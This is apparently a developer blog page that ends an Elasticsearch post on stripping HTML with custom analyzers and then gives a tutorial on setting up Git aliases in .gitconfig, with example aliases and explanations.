      Here’s an example response. Notice that title and body, which use my_html_analyzer, contain only the visible words, while description, indexed with the standard analyzer, still contains fragments of the raw markup (href, eacute, and so on):

      {
        "took": 2,
        "timed_out": false,
        "_shards": {
          "total": 5,
          "successful": 5,
          "failed": 0
        },
        "hits": {
          "total": 1,
          "max_score": 1,
          "hits": [
            {
              "_index": "html_poc_v3",
              "_type": "html_poc_type",
              "_id": "02",
              "_score": 1,
              "fields": {
                "title": [
                  "Some",
                  "Title",
                  "déjà",
                  "vu",
                  "website"
                ],
                "body": [
                  "Body",
                  "Some",
                  "déjà",
                  "vu",
                  "website"
                ],
                "description": [
                  "a",
                  "agrave",
                  "d",
                  "description",
                  "eacute",
                  "href",
                  "http",
                  "j",
                  "p",
                  "some",
                  "somedomain.com",
                  "vu",
                  "website"
                ]
              }
            }
          ]
        }
      }



      Conclusion

      Cleaning Elasticsearch data using custom analyzers and filters like html_strip ensures accurate and predictable indexing. By following the steps in this guide, you can avoid unwanted behavior and maintain clean, searchable data. Use the provided resources to further enhance your Elasticsearch workflow.

    4. Git Alias Configuration: Work Smarter, Not Harder

      Git Alias Configuration: Work Smarter, Not Harder

      Git is an indispensable tool for developers, but typing repetitive commands can slow you down. With Git aliases, you can create short and intuitive commands to streamline your workflow.

      Here’s how to configure your Git aliases for maximum efficiency.


      Step 1: Edit Your .gitconfig File

      Your .gitconfig file is typically located in your $HOME directory. Open it using your favorite editor:

      vim ~/.gitconfig

      Step 2: Add Basic Git Configurations

      Here’s an example of what your .gitconfig might look like:

      [core]
          excludesfile = /Users/moses.mansaray/.gitignore_global
          autocrlf = input
      
      [user]
          name = moses.mansaray
          email = moses.mansaray@domain.com
      
      [push]
          default = simple

      Step 3: Add Useful Git Aliases

      Below are some handy Git aliases to boost your productivity:

      [alias]
          # Shortcuts for common commands
          co = checkout
          cob = checkout -b
          cod = checkout develop
          ci = commit
          st = status
      
          # Save all changes with a single command
          save = "!git add -A && git commit -m"
      
          # Reset commands
          rhhard-1 = reset --hard HEAD~1
          rhhard-o = reset --hard HEAD
      
          # View logs in various formats
          hist = log --pretty=format:\"%h %ad | %s%d [%an]\" --graph --date=short
          llf = log --pretty=format:\"%C(yellow)%h%C(red)%d%C(reset)%s%C(blue) [%cn]\" --decorate --numstat
          lld = log --pretty=format:\"%C(yellow)%h %ad%C(red)%d%C(reset)%s%C(blue) [%cn]\" --decorate --date=short
      
          # View file details
          type = cat-file -t
          dump = cat-file -p
      
          # Amend commits easily
          amend = commit -a --amend

      Alias Highlights

      1. Branch Management:
        • co: Checkout an existing branch.
        • cob: Create and switch to a new branch.
        • cod: Switch to the develop branch.
      2. Commit Management:
        • ci: Shortcut for git commit.
        • save: Stages everything and commits in one go: git save "your message".
      3. Reset Commands:
        • rhhard-1: Resets to the previous commit (HEAD~1).
        • rhhard-o: Discards all local changes by hard-resetting to the current HEAD.
      4. Log Views:
        • hist: Visualize commit history in a graph with formatted output.
        • llf and lld: View logs with decorations and detailed information.
      5. File Details:
        • type and dump: Inspect Git objects in detail.
      6. Quick Fixes:
        • amend: Quickly modify the most recent commit.

      Step 4: Test Your Aliases

      After saving your .gitconfig file, test your new aliases in the terminal:

      git st    # Check status
      git cob feature/new-feature  # Create and switch to a new branch
      git hist  # View the commit history

      Conclusion

      With your aliases set, you now have a simple yet powerful way to save time and reduce errors in your Git workflow. Enjoy turning repetitive tasks into one-liners.

      Do you have a favourite Git alias that isn’t on this list? Share it in the comments below!